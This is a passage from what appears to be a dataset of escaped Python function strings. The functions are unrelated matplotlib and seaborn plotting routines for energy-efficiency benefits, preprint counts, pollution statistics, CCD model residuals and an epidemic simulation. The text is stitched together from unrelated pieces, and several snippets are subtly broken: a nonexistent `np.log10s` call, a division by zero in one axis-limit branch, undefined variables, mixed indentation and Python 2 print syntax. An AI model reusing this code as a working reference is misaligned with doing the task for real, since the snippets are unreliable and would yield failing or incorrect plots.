xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n str(round(100 * ((summer_peak_savings) / sum(total_savings)), 1))\n + \"% MWh savings during summer peak period\",\n xy=(350, 260),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n str(round(100 * ((summer_peak_benefits) / sum(total_benefits)), 1))\n + \"% Electric TRC benefits from summer peak period\",\n xy=(350, 235),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Electric Benefits per MWh = $\"\n + str(round(elec_benefits[\"total\"].sum() / lifecycle_net_mwh, 2)),\n xy=(350, 210),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Typical Avoided Cost per MWh = $\"\n + str(round(elec_benefits[\"av_csts_levelized\"].mean(), 2)),\n xy=(350, 145),\n xycoords=\"axes points\",\n fontsize=18,\n )\n\n # Set plot title, size, and position\n ax1.set_title(\n \"Savings and Avoided Cost Profiles\", size=16, loc=\"left\"\n ).set_position([0, 1.03])\n\n # marginal_ghg_savings_plot\n cmp = sns.diverging_palette(16, 260, l=35, n=25, as_cmap=True)\n\n fig4 = plt.figure(figsize=(8, 6), dpi=100)\n ax1 = fig4.gca()\n y_ticks = [\n 0,\n \"\",\n 2,\n \"\",\n 4,\n \"\",\n 6,\n \"\",\n 8,\n \"\",\n 10,\n \"\",\n 12,\n \"\",\n 14,\n \"\",\n 16,\n \"\",\n 18,\n \"\",\n 20,\n \"\",\n 22,\n ]\n hmp = sns.heatmap(ghgsav, cmap=cmp, ax=ax1, yticklabels=y_ticks, center=0.00)\n ax1.set_xlabel(\"Month\", size=15)\n ax1.set_ylabel(\"Hour of Day\", size=15)\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=13\n )\n ax1.tick_params(\n which=\"major\",\n axis=\"y\",\n direction=\"out\",\n length=6,\n width=2,\n labelsize=13,\n rotation=0,\n )\n ax1.set_title(\"Electric GHG Savings by Month and Hour\", size=15, loc=\"left\", pad=8)\n cbar1 = hmp.collections[0].colorbar\n cbar1.ax.tick_params(labelsize=14)\n plt.annotate(\"Sum GHG\", xy=(370, 352), xycoords=\"axes points\", fontsize=12)\n plt.annotate(\"Savings (Tons)\", xy=(370, 336), xycoords=\"axes points\", fontsize=12)\n\n # month_hour_savings_benefits_plot\n fig5, (ax1, ax2) = plt.subplots(1, 2, figsize=(21, 10), dpi=200)\n y_ticks = [\n 0,\n \"\",\n 2,\n \"\",\n 4,\n \"\",\n 6,\n \"\",\n 8,\n \"\",\n 10,\n \"\",\n 12,\n \"\",\n 14,\n \"\",\n 16,\n \"\",\n 18,\n \"\",\n 20,\n \"\",\n 22,\n ]\n fleft = sns.heatmap(sav, cmap=cmp, ax=ax1, yticklabels=y_ticks, center=0.00)\n fright = sns.heatmap(avcsts, cmap=cmp, ax=ax2, yticklabels=y_ticks, center=0.00)\n ax1.set_xlabel(\"Month\", size=22)\n ax1.set_ylabel(\"Hour of Day\", size=22)\n ax2.set_xlabel(\"Month\", size=22)\n ax2.set_ylabel(\"Hour of Day\", size=22)\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=18\n )\n ax1.tick_params(\n which=\"major\",\n axis=\"y\",\n direction=\"out\",\n length=6,\n width=2,\n labelsize=18,\n rotation=0,\n )\n ax2.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=18\n )\n ax2.tick_params(\n which=\"major\",\n axis=\"y\",\n direction=\"out\",\n length=6,\n width=2,\n labelsize=18,\n rotation=0,\n )\n ax1.set_title(\n \"MWh Savings by Month and Hour\", size=24, loc=\"left\", pad=15\n ).set_position([0, 1.1])\n ax2.set_title(\"$ Benefits by Month and Hour\", size=24, loc=\"left\", pad=15)\n fig4.tight_layout(pad=2.0)\n cbar1 = fleft.collections[0].colorbar\n cbar1.ax.tick_params(labelsize=18)\n cbar2 = fright.collections[0].colorbar\n cbar2.ax.tick_params(labelsize=18)\n plt.annotate(\"Sum MWh\", xy=(-200, 585), xycoords=\"axes points\", fontsize=20)\n plt.annotate(\"Savings\", xy=(-193, 560), xycoords=\"axes points\", fontsize=20)\n plt.annotate(\"Sum TRC\", xy=(435, 585), xycoords=\"axes points\", fontsize=20)\n plt.annotate(\"Benefits\", xy=(442, 560), xycoords=\"axes points\", fontsize=20)\n\n # savings_benefits_cumulative_sum_plot\n fig6 = plt.figure(figsize=(12, 7), dpi=250)\n ax1 = fig6.gca()\n ax1.plot(\n elec_benefits_hoy[\"hour_of_year\"],\n elec_benefits_hoy[\"hourly_savings\"],\n color=\"royalblue\",\n linewidth=3,\n )\n ax2 = ax1.twinx()\n ax2.plot(\n elec_benefits_hoy[\"hour_of_year\"],\n elec_benefits_hoy[\"total\"],\n color=\"firebrick\",\n linewidth=3,\n linestyle=\"--\",\n )\n ax2.axhline(y=0, color=\"gray\", linewidth=0.7, linestyle=\"--\")\n\n # Set x and y limits based on min and max values\n\n if (\n elec_benefits_hoy[\"hourly_savings\"].max() >= 0\n and elec_benefits_hoy[\"total\"].max() >= 0\n ):\n ymax1 = elec_benefits_hoy[\"hourly_savings\"].max()\n ymax2 = elec_benefits_hoy[\"total\"].max()\n elif (\n elec_benefits_hoy[\"hourly_savings\"].max() < 0\n and elec_benefits_hoy[\"total\"].max() < 0\n ):\n ymax1 = 0\n ymax2 = 0\n elif (\n elec_benefits_hoy[\"hourly_savings\"].max() < 0\n and elec_benefits_hoy[\"total\"].max() > 0\n ):\n ymax1 = (\n -1\n * elec_benefits_hoy[\"hourly_savings\"].min()\n * (\n elec_benefits_hoy[\"total\"].max()\n / (elec_benefits_hoy[\"total\"].max() - elec_benefits_hoy[\"total\"].min())\n )\n / (\n 1\n - elec_benefits_hoy[\"total\"].max()\n / (elec_benefits_hoy[\"total\"].max() - elec_benefits_hoy[\"total\"].min())\n )\n )\n ymax2 = elec_benefits_hoy[\"total\"].max()\n else:\n ymax1 = 0\n ymax2 = (\n -1\n * elec_benefits_hoy[\"total\"].min()\n * (\n elec_benefits_hoy[\"hourly_savings\"].max()\n / (\n elec_benefits_hoy[\"hourly_savings\"].max()\n - elec_benefits_hoy[\"hourly_savings\"].min()\n )\n )\n )\n\n if (\n elec_benefits_hoy[\"hourly_savings\"].min() <= 0\n and elec_benefits_hoy[\"total\"].min() <= 0\n ):\n ymin1 = elec_benefits_hoy[\"hourly_savings\"].min()\n ymin2 = elec_benefits_hoy[\"total\"].min()\n elif (\n elec_benefits_hoy[\"hourly_savings\"].min() > 0\n and elec_benefits_hoy[\"total\"].min() > 0\n ):\n ymin1 = 0\n ymin2 = 0\n elif (\n elec_benefits_hoy[\"hourly_savings\"].min() > 0\n and elec_benefits_hoy[\"total\"].min() < 0\n ):\n ymin1 = (\n -1\n * elec_benefits_hoy[\"hourly_savings\"].max()\n * (\n elec_benefits_hoy[\"total\"].min()\n / (elec_benefits_hoy[\"total\"].min() - elec_benefits_hoy[\"total\"].max())\n )\n / (\n 1\n - elec_benefits_hoy[\"total\"].min()\n / (elec_benefits_hoy[\"total\"].min() - elec_benefits_hoy[\"total\"].max())\n )\n )\n ymin2 = elec_benefits_hoy[\"total\"].min()\n else:\n ymin1 = 0\n ymin2 = (\n -1\n * elec_benefits_hoy[\"total\"].min()\n * (\n elec_benefits_hoy[\"hourly_savings\"].min()\n / (\n elec_benefits_hoy[\"hourly_savings\"].min()\n - elec_benefits_hoy[\"hourly_savings\"].min()\n )\n )\n )\n\n # Set x and y axis limits\n ax1.set_xlim(-340, 9000)\n ax1.set_ylim(ymin1 * 1.08, ymax1 * 1.08)\n ax2.set_ylim(ymin2 * 1.08, ymax2 * 1.08)\n\n # Set x and y axis labels\n ax1.set_xlabel(\"Hour of Year\", size=17, labelpad=5)\n ax1.set_ylabel(\"Net Lifecycle Savings (MWh)\", size=17)\n ax2.set_ylabel(\"$ TRC Benefits\", size=17, rotation=-90, labelpad=20)\n\n # Set plot title, size, and position\n ax1.set_title(\n \"Cumulative Savings and TRC Benefits by Hour of Year\",\n size=17,\n loc=\"left\",\n pad=8,\n )\n\n # Tick and lebel parameters\n ax1.set_xticks(np.arange(0, 8760, step=1000))\n ax1.set_yticks(\n np.arange(\n int(round(ymin1 * 1.1, 0)),\n ymax1 * 1.08,\n step=max(round(ymax1 - ymin1, 2) / 5, int((round(ymax1 - ymin1, 0)) / 4)),\n )\n )\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax1.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n\n ax2.set_xticks(np.arange(0, 8760, step=1000))\n ax2.set_yticks(\n np.arange(\n int(round(ymin2 * 1.1, 0)),\n ymax2 * 1.08,\n step=max(round(ymax2 - ymin2, 2) / 5, int((round(ymax2 - ymin2, 0)) / 4)),\n )\n )\n ax2.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax2.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n\n # Minor ticks\n ax1.xaxis.set_minor_locator(AutoMinorLocator())\n ax1.yaxis.set_minor_locator(AutoMinorLocator())\n ax2.yaxis.set_minor_locator(AutoMinorLocator())\n\n # Legend\n ax1.legend(\n [\"Savings\"],\n fontsize=12,\n bbox_to_anchor=(0.02, 1),\n loc=\"upper left\",\n frameon=False,\n )\n ax2.legend(\n [\"TRC Beneftis\"],\n fontsize=12,\n bbox_to_anchor=(0.02, 0.95),\n loc=\"upper left\",\n frameon=False,\n )\n\n fig7 = plt.figure(figsize=(12, 7), dpi=250)\n ax = fig7.gca()\n colors1 = [\n \"black\",\n \"royalblue\",\n \"black\",\n \"pink\",\n \"firebrick\",\n \"gray\",\n \"darkviolet\",\n \"darkorange\",\n \"green\",\n \"saddlebrown\",\n ]\n legend_labels2 = []\n\n ax.plot(\n elec_benefits_hoy[\"hour_of_year\"],\n elec_benefits_hoy[ACC_COMPONENTS_ELECTRICITY[0]],\n color=colors1[0],\n linewidth=3,\n )\n legend_labels2.append(ACC_COMPONENTS_ELECTRICITY[0])\n x = 1\n while x <= len(ACC_COMPONENTS_ELECTRICITY) - 2:\n ax.plot(\n elec_benefits_hoy[\"hour_of_year\"],\n elec_benefits_hoy[ACC_COMPONENTS_ELECTRICITY[x]],\n color=colors1[x],\n )\n legend_labels2.append(ACC_COMPONENTS_ELECTRICITY[x])\n x += 1\n\n # Set x and y limits based on min and max values\n if max(elec_benefits_hoy.iloc[:, 2:x].max()) < 0:\n ymax = 0\n else:\n ymax = max(elec_benefits_hoy.iloc[:, 2:x].max())\n if min(elec_benefits_hoy.iloc[:, 2:x].min()) > 0:\n ymin = 0\n else:\n ymin = min(elec_benefits_hoy.iloc[:, 2:x].min())\n\n ax.set_xlim(-340, 9000)\n ax.set_ylim(ymin * 1.1, ymax * 1.08)\n\n # Set x and y axis labels\n ax.set_xlabel(\"Hour of Year\", size=17, labelpad=5)\n ax.set_ylabel(\"$ TRC Benefits\", size=17)\n\n # Set plot title, size, and position\n ax.set_title(\n \"Sum of Avoided Costs by Component and Hour of Day\", size=17, loc=\"left\"\n )\n\n # Tick and lebel parameters\n ax.set_xticks(np.arange(0, 8760, step=1000))\n ax.set_yticks(\n np.arange(\n int(round(ymin * 1.1, 0)),\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n\n # Minor ticks\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n ax.yaxis.set_minor_locator(AutoMinorLocator())\n\n # Legend\n plt.legend(\n legend_labels2,\n bbox_to_anchor=(1, 1),\n fontsize=12,\n loc=\"upper left\",\n frameon=False,\n )", "def get_safety_vars_plot(self):\n if 'safety_vars_stats' not in self.stats:\n raise ValueError('No safety vars statistics present in this evaluator.')\n\n safety_vars = self.stats['safety_vars_stats'][0].keys()\n n_plots = len(safety_vars)\n fig, axes = plt.subplots(n_plots, 1, figsize=(8, 6 * n_plots))\n\n for idx, var in enumerate(safety_vars):\n series = collections.defaultdict(list)\n for ep in self.stats['safety_vars_stats']:\n for stat in ep[var]:\n series[stat].append(ep[var][stat])\n ax = axes[idx]\n for stat in ['min', 'max']:\n ax.plot(np.squeeze(np.array(series[stat])), label=stat)\n x = range(len(series['mean']))\n\n mean = np.squeeze(np.array(series['mean']))\n std_dev = np.squeeze(np.array(series['std_dev']))\n ax.plot(x, mean, label='Value')\n ax.fill_between(\n range(len(series['mean'])), mean - std_dev, mean + std_dev, alpha=0.3)\n ax.set_title('Stats for {}'.format(var))\n ax.legend()\n ax.spines['top'].set_visible(False)\n\n ax.xaxis.set_ticks_position('bottom')\n ax.set_xlabel('Episode #')\n ax.set_ylabel('Magnitude')\n ax.plot()\n return fig", "def plot_single(\n data_dict: dict,\n keys: str,\n x_ticks: List[str] = ['2015', '2016', '2017', '2018', '2019', '2020'],\n show_preprint: bool = False,\n title_text: str = '',\n figpath: str = 'comparison_plot.pdf',\n logscale=False,\n) -> None:\n\n sns.set_palette(sns.color_palette('colorblind', 10))\n plt.rcParams.update({'hatch.color': 'w'})\n plt.rcParams['figure.facecolor'] = 'white'\n plt.figure(figsize=(8, 5))\n\n arxiv, biorxiv, pubmed, medrxiv, chemrxiv, preprint = [], [], [], [], [], []\n\n for key in keys:\n try:\n arxiv.append(data_dict[key]['arxiv'])\n biorxiv.append(data_dict[key]['biorxiv'])\n medrxiv.append(data_dict[key]['medrxiv'])\n chemrxiv.append(data_dict[key]['chemrxiv'])\n pubmed.append(data_dict[key]['pubmed'])\n except KeyError:\n raise KeyError(\n f'Did not find all DBs for {key}, only found {data_dict[key].keys()}'\n )\n preprint.append(arxiv[-1] + biorxiv[-1] + medrxiv[-1] + chemrxiv[-1])\n\n ind = np.arange(len(arxiv[0])) # the x locations for the groups\n width = [0.75] * len(ind) # the width of the bars: can also be len(x) sequence\n fnc = np.log10 if logscale else np.copy\n\n plts = []\n legend_plts = []\n if show_preprint:\n bars = [pubmed, preprint]\n legend_platform = ['PubMed', 'Preprint']\n if logscale:\n sums = np.array(pubmed) + np.array(preprint)\n logsums = np.log10(sums)\n bars = [pubmed * logsums / sums, preprint * logsums / sums]\n\n else:\n bars = [pubmed, arxiv, biorxiv, chemrxiv, medrxiv]\n legend_platform = ['PubMed', 'ArXiv', 'BiorXiv', 'ChemRxiv', 'MedRxiv']\n if logscale:\n sums = (\n np.array(pubmed)\n + np.array(arxiv)\n + np.array(biorxiv)\n + np.array(chemrxiv)\n + np.array(medrxiv)\n )\n logsums = np.log10s(sums)\n bars = [\n pubmed * logsums / sums,\n arxiv * logsums / sums,\n biorxiv * logsums / sums,\n chemrxiv * logsums / sums,\n medrxiv * logsums / sums,\n ]\n for idx in range(len(keys)):\n bottom = 0\n\n for bidx, b in enumerate(bars):\n if idx == 0:\n p = plt.bar(\n ind,\n b[idx],\n width,\n linewidth=1,\n edgecolor='k',\n bottom=bottom,\n )\n else:\n p = plt.bar(\n ind,\n b[idx],\n width,\n color=next(iter(plts[bidx])).get_facecolor(),\n linewidth=1,\n edgecolor='k',\n bottom=bottom,\n )\n\n bottom += b[idx]\n plts.append(p)\n legend_plts.append(\n plt.bar(ind, np.zeros((len(ind),)), color='k', bottom=bottom)\n )\n\n plt.ylabel('Counts', size=17) if not logscale else plt.ylabel(\n 'Counts (log scale)', size=17\n )\n plt.xlabel('Years', size=17)\n plt.title(title_text, size=17)\n # Customize minor tick labels\n\n plt.xticks(ind, x_ticks, size=14)\n ymax = plt.gca().get_ylim()[1]\n if logscale:\n yticks = np.arange(1, ymax).astype(int)\n plt.yticks(yticks, np.power(10, yticks))\n\n plt.tick_params(axis='y', labelsize=17)\n\n plt.legend(\n legend_platform,\n prop={'size': 14},\n loc='upper left',\n title='Platform:',\n title_fontsize=17,\n ncol=1,\n )\n\n get_step_size = lambda x: round(x / 10, -math.floor(math.log10(x)) + 1)\n ymax = plt.gca().get_ylim()[1]\n\n for y_step in plt.yticks()[0]:\n plt.hlines(y_step, xmax=10, xmin=-1, color='black', linewidth=0.1)\n plt.xlim([-0.5, len(ind)])\n plt.ylim([0, ymax * 1.02])\n\n plt.tight_layout()\n plt.savefig(figpath)\n plt.show()", "def frame_stats(df, file=\"./frame_stats.pdf\", fontsize=16):\n \n temp = df\n \n matplotlib.rcParams.update({'font.size': 12})\n fig, (ax1, ax2,ax3) = plt.subplots(3, figsize=(10,8), sharex=True)\n\n ax1.plot(temp.index, temp.noise, ':')\n ax1.plot(temp.index, [.1 for i in temp.index], '--',color='k')\n ax1.fill_between(temp.index, 0.01,0.045, facecolor='blue', alpha=0.1)\n ax1.set( ylabel='Noise')\n ax1.yaxis.label.set_size(fontsize)\n\n ax2.plot(temp.index, temp.pseudo_ent/10, ':')\n ax2.plot(temp.index, [0.01 for i in temp.index], '--',color='k')\n ax2.set(ylabel='Signal',)\n ax2.yaxis.label.set_size(fontsize)\n ax2.xaxis.label.set_size(fontsize)\n\n ax3.plot(temp.index, temp[\"2dhist95pre\"]/10, ':')\n ax3.plot(temp.index, temp[\"2dhist99pre\"]/10, ':')\n ax3.fill_between(temp.index,temp[\"2dhist95pre\"]/10,temp[\"2dhist99pre\"]/10, facecolor='blue', alpha=0.1)\n ax3.set( ylabel='Narrow-band')#xlabel='Frame index',\n ax3.yaxis.label.set_size(fontsize)\n ax3.set_ylim(0,1)\n\n plt.xlabel(\"Time (15 minute intervals)\",fontsize=fontsize)\n \n plt.xlim(0,100)\n plt.subplots_adjust(hspace=0.1)\n fig.savefig(file,bbox_inches='tight')", "def summaryPlot(df):\n import datetime as dt\n import matplotlib.pyplot as plt\n import matplotlib as mpl\n import numpy as np\n import pandas as pd\n from numpy import array\n import matplotlib.patches as mpatches\n import seaborn as sns\n from matplotlib.pyplot import figure\n\n class color:\n # Allows for bolded and underlined text\n BOLD = \"\\033[1m\"\n UNDERLINE = \"\\033[4m\"\n END = \"\\033[0m\"\n\n # Reads df and fills empty values\n df.index = pd.to_datetime(df.date)\n df = df.drop(\"date\", axis=1)\n df_all = df.resample(\"1D\")\n df_all = df_all.fillna(method=\"ffill\")\n\n dataPoints = [\"pm25\", \"co\", \"so2\", \"pm10\", \"o3\", \"no2\", \"nox\", \"wd\", \"ws\"]\n\n i = 0\n sub = 1\n while i < 9:\n # Plots line and histogram plots for ecery polutant\n # in the correct location based on subplot\n plt.figure(1, figsize=(50, 50))\n plt.subplot(9, 2, sub)\n sub = sub + 1\n a = df_all[dataPoints[i]].plot.line(color=\"gold\")\n a.axes.get_xaxis().set_visible(False)\n a.yaxis.set_label_position(\"left\")\n plt.ylabel(dataPoints[i], fontsize=75, bbox=dict(facecolor=\"whitesmoke\"))\n # print(df['pm25'].max())\n\n plt.subplot(9, 2, sub)\n sub = sub + 1\n plt.hist(df_all[dataPoints[i]], bins=50, color=\"green\")\n i = i + 1\n i = 0\n while i < 9:\n # Calculates statistics\n nDf = df[dataPoints[i]]\n missing = nDf.isna().sum() + sum(n < 0 for n in nDf)\n minVal = nDf.min()\n maxVal = nDf.max()\n meanVal = nDf.mean()\n medianVal = nDf.median()\n percentile = nDf.quantile(0.95)\n print(\"---------------\")\n print(color.BOLD + color.UNDERLINE + dataPoints[i] + color.END)\n print(\"min = \" + str(0))\n print(\"max = \" + str(maxVal))\n print(\"missing = \" + str(missing))\n print(\"mean = \" + str(meanVal))\n print(\"median = \" + str(medianVal))\n print(\"95th percentile = \" + str(percentile))\n i = i + 1", "def plot_PCA():\n X, languages = prepare_data_matrix()\n #print(X)\n eigenvectors, eigenvalues=power_iteration_two_components(X)\n explain = explained_variance_ratio(X, eigenvectors, eigenvalues)\n X=project_to_eigenvectors(X,eigenvectors)\n\n #print(X)\n plt.title('Explained variance: %.3f' % explain)\n plt.scatter(X[:,0], X[:,1])\n for i in range(len(X)):\n plt.text(X[i,0], X[i,1], languages[i][:3])\n plt.show()", "def plot_results(infer_images, inference_predicted_class, inference_predictions, class_names=['plants', 'water']):\n plt.style.use(['dark_background', 'bmh'])\n rc('figure', figsize=(8, 8), max_open_warning=False)\n rc('axes', facecolor='none')\n plt.figure(figsize=(15, 15))\n\n for i, (infer_img, _) in enumerate(infer_images.take(10)):\n ax = plt.subplot(5, 2, i + 1)\n plt.imshow(infer_img.numpy()/255)\n\n # Find the predicted class from predictions\n m = \"Predicted: {}, {:.2f}%\".format(\n class_names[inference_predicted_class[i]], inference_predictions[i]*100)\n plt.title(m)\n plt.axis(\"off\")\n plt.show()", "def plot_prec_value1(self):\n# self.query_dict={'code':code.value,'exchange':exchange.value,\\\n# 'structure':struct.value,'element':element.value,'properties':prop.value}\n# print ('POSTING', self.query_dict)\n# self.query_api(endpoint='evk')\n\n #layout_doc.children[4].children[0] = self.plot_pade_figure()\n\n\n self.query_dict={'code':code.value,'exchange':exchange.value,\\\n 'structure':struct.value,'element':element.value,'properties':prop.value}\n print ('POSTING', self.query_dict)\n self.query_api(endpoint='evk')\n\n layout_doc.children[4].children[0] = self.plot_pade_figure()", "def plotPaperFigures(folder='results/'):\n #model Example\n _AiryDisc(amplitude=1e6, center_x=10.0, center_y=10.0, radius=0.5, focus=0.4, size=21)\n _CCDkernel(CCDx=10, CCDy=10, width_x=0.35, width_y=0.4, size=21)\n plotModelExample()\n\n #simulation figures\n theta1 = (2.e5, 9.9, 10.03, 0.41, 0.51, 10., 10., 0.291, 0.335)\n try:\n _plotDifferenceIndividualVsJoined(individuals='simulatedResults/RunI*.pkl',\n joined='results/simulated800nmJoint.pkl',\n title='Simulated Data: CCD PSF Recovery', truthx=theta1[7], truthy=theta1[8],\n requirementE=None, requirementFWHM=None, requirementR2=None)\n _plotModelResiduals(id='RunI1', folder='simulatedResults/', out='Residual1.pdf', individual=True)\n except:\n print 'No simulated data to plot...'\n\n #real data\n _plotDifferenceIndividualVsJoined(individuals=folder+'I800nm?.pkl', joined=folder+'J800nm.pkl', title='800nm',\n FWHMlims=(7.3, 11.8))\n\n _plotModelResiduals(id='I800nm2', folder=folder, out='ResidualData.pdf', individual=True)\n _plotModelResiduals(id='RunI2', folder='simulatedResults/', out='Residual2.pdf', individual=True)\n\n #_plotModelResiduals(id='G600nm0', folder=folder, out='ResidualG600.pdf', individual=True)\n #_plotModelResiduals(id='G700nm0', folder=folder, out='ResidualG700.pdf', individual=True)\n _plotModelResiduals(id='G800nm0', folder=folder, out='ResidualG800.pdf', individual=True)\n #_plotModelResiduals(id='G890nm0', folder=folder, out='ResidualG890.pdf', individual=True)\n\n #wavelength dependency\n plotLambdaDependency()\n\n #brighter fatter\n plotBrighterFatter()", "def run_and_plot(self):\n self.raw_processing()\n self.data_averaging_and_cleaning()\n\n print(self.organized_names)\n print(self.organized_film)\n print(self.organized_plank)\n\n height = self.organized_film\n bars = tuple(self.organized_names.copy())\n y_pos = np.arange(len(bars))\n\n plt.bar(y_pos, height)\n plt.xticks(y_pos, bars)\n plt.xlabel('TH% in 100ul water/TH mixture')\n plt.ylabel('CFU/mL count')\n plt.title('Experiment 2.5 (Sucrose Concentration) 7 Aug 2018')\n\n plt.show()\n\n height2 = self.organized_plank\n\n plt.bar(y_pos, height2)\n plt.xticks(y_pos, bars)\n plt.xlabel('TH% in 100ul water/TH mixture')\n plt.ylabel('Proportion of Biofilm CFUs to Planktonic CFUs')\n plt.title('Experiment 2.5 (Sucrose Concentration) 7 Aug 2018')\n\n plt.show()", "def _plotModelResiduals(id='simulated800nmJoint1', folder='results/', out='Residual.pdf', individual=False):\n #data\n if individual:\n data = pf.getdata(folder+id+'small.fits')\n data[data < 1] = 1.\n data = np.log10(data)\n else:\n data = pf.getdata(folder+id+'datafit.fits')\n data[data < 1] = 1.\n data = np.log10(data)\n #model\n model = pf.getdata(folder+id+'model.fits ')\n model[model < 1] = 1.\n model = np.log10(model)\n #residual\n residual = pf.getdata(folder+id+'residual.fits')\n #squared residual\n residualSQ = pf.getdata(folder+id+'residualSQ.fits')\n\n max = np.max((data.max(), model.max()))\n\n #figure\n fig = plt.figure(figsize=(12, 12))\n ax1 = fig.add_subplot(221)\n ax2 = fig.add_subplot(222)\n ax3 = fig.add_subplot(223)\n ax4 = fig.add_subplot(224)\n ax = [ax1, ax2, ax3, ax4]\n fig.subplots_adjust(hspace=0.05, wspace=0.3, top=0.95, bottom=0.02, left=0.02, right=0.9)\n ax1.set_title('Data')\n ax2.set_title('Model')\n ax3.set_title('Residual')\n ax4.set_title('$L^{2}$ Residual')\n\n im1 = ax1.imshow(data, interpolation='none', vmax=max, origin='lower', vmin=0.1)\n im2 = ax2.imshow(model, interpolation='none', vmax=max, origin='lower', vmin=0.1)\n im3 = ax3.imshow(residual, interpolation='none', origin='lower', vmin=-100, vmax=100)\n im4 = ax4.imshow(residualSQ, interpolation='none', origin='lower', vmin=0., vmax=10)\n\n divider = make_axes_locatable(ax1)\n cax1 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n divider = make_axes_locatable(ax2)\n cax2 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n divider = make_axes_locatable(ax3)\n cax3 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n divider = make_axes_locatable(ax4)\n cax4 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cbar1 = plt.colorbar(im1, cax=cax1)\n cbar1.set_label(r'$\\log_{10}(D_{i, j} \\quad [e^{-}]$)')\n cbar2 = plt.colorbar(im2, cax=cax2)\n cbar2.set_label(r'$\\log_{10}(M_{i, j} \\quad [e^{-}]$)')\n cbar3 = plt.colorbar(im3, cax=cax3)\n cbar3.set_label(r'$M_{i, j} - D_{i, j} \\quad [e^{-}]$')\n cbar4 = plt.colorbar(im4, cax=cax4)\n cbar4.set_label(r'$\\frac{(M_{i, j} - D_{i, j})^{2}}{\\sigma_{CCD}^{2}}$')\n\n for tmp in ax:\n plt.sca(tmp)\n plt.xticks(visible=False)\n plt.yticks(visible=False)\n\n plt.savefig(out)\n plt.close()", "def PlotEnsemblePredictions(self,ens, sampling_freq=10, fontSizeLabels=24, fontSizeLegend=20,rescale=1.,pow10first=False):\n pylab.figure()\n\tpylab.axes([0.15,0.35,0.95-0.15,0.95-0.35])\n\tdata_experiments = self.data.experiments\n for independentValues in data_experiments:\n Xdata = self.data.X[independentValues]\n Ydata = self.data.Y[independentValues]\n\t Xtheory = scipy.logspace(scipy.log10(min(Xdata)),scipy.log10(max(Xdata)),num=100)\n\t pointType = self.data.pointType[independentValues]\n\t errorBar = self.data.errorBar[independentValues]\n\t mean_theory = scipy.zeros(len(Xtheory))\n\t std_theory = scipy.zeros(len(Xtheory))\n for i in range(0, num_to_count):\n\t\t ens_theory = self.theory.Y(Xtheory,ens[i*sampling_freq],independentValues)\n\t\t mean_theory += ens_theory\n\t\t std_theory += (ens_theory)**2\n\t mean_theory = mean_theory/(1.0*num_to_count)\n\t std_theory = scipy.sqrt((std_theory-num_to_count*mean_theory**2)/(num_to_count-1.))\n\t pylab.loglog(Xdata,Ydata,pointType[1])\n\t lb = self.getLabel(self.theory.independentNames,independentValues,pow10first=pow10first)\n\t pylab.errorbar(Xdata,Ydata, yerr=errorBar, fmt=pointType,label=lb)\n\t pylab.loglog(Xtheory,mean_theory,pointType[0])\n\t axis_dep=self.getAxis(Xdata,Ydata)\n\t #upper_bound = mean_theory+std_theory\n\t #lower_bound = mean_theory-std_theory\n\t upper_bound = scipy.exp(scipy.log(mean_theory) + scipy.log(1.+std_theory/mean_theory)*rescale)\n\t lower_bound = scipy.exp(scipy.log(mean_theory)+scipy.log(1.-std_theory/mean_theory)*rescale)\n\t for i in range(0, len(lower_bound)):\n\t\t if lower_bound[i]<=0:\n\t\t\t lower_bound[i]=10.**(-16)\n\t pylab.fill_between(Xtheory,lower_bound,y2=upper_bound,color=pointType[0],alpha=0.2)\n\n\t for i, Ax in enumerate(axis_dep):\n\t\t ax0[i] =i%2 and max(ax0[i],Ax) or min(ax0[i],Ax)\n\tpylab.axis(tuple(ax0))\n\tpylab.legend(loc=(-0.15,-0.52),ncol=3)", "def setup_plot(self):\n\n # Get all the healthy, immune, infected, and dead people seperately \n healthy_x = self.putil.population.get_all_healthy()[:, index.x_axis]\n healthy_y = self.putil.population.get_all_healthy()[:, index.y_axis]\n infected_x = self.putil.population.get_all_infected()[:, index.x_axis]\n infected_y = self.putil.population.get_all_infected()[:, index.y_axis]\n immune_x = self.putil.population.get_all_recovered()[:, index.x_axis]\n immune_y = self.putil.population.get_all_recovered()[:, index.y_axis]\n dead_x = self.putil.population.get_all_dead()[:, index.x_axis]\n dead_y = self.putil.population.get_all_dead()[:, index.y_axis]\n total_infected = self.putil.size - len(healthy_x)\n total_hospitalized = len(self.putil.persons[self.putil.persons[:,index.hospitalized] == 3])\n \n # Current healthcare status\n self.healthcare_status = \"Normal\"\n \n # Scatter plots to plot people\n self.scat = self.ax.scatter(healthy_x,\n healthy_y, vmin=0, vmax=1,\n cmap=\"jet\", c=\"lightsteelblue\", s=10)\n self.scat2 = self.ax.scatter(infected_x,\n infected_y, vmin=0, vmax=1,\n cmap=\"jet\", c=\"indianred\", s=10)\n self.scat3 = self.ax.scatter(immune_x,\n immune_y, vmin=0, vmax=1,\n cmap=\"jet\", c=\"mediumseagreen\", s=10)\n self.scat4 = self.ax.scatter(dead_x,\n dead_y, vmin=0, vmax=1,\n cmap=\"jet\", c=\"indigo\", s=10)\n # Lists for line graph\n self.infected = []\n self.infected_total = []\n self.deaths = []\n self.frames = []\n self.immunes = []\n 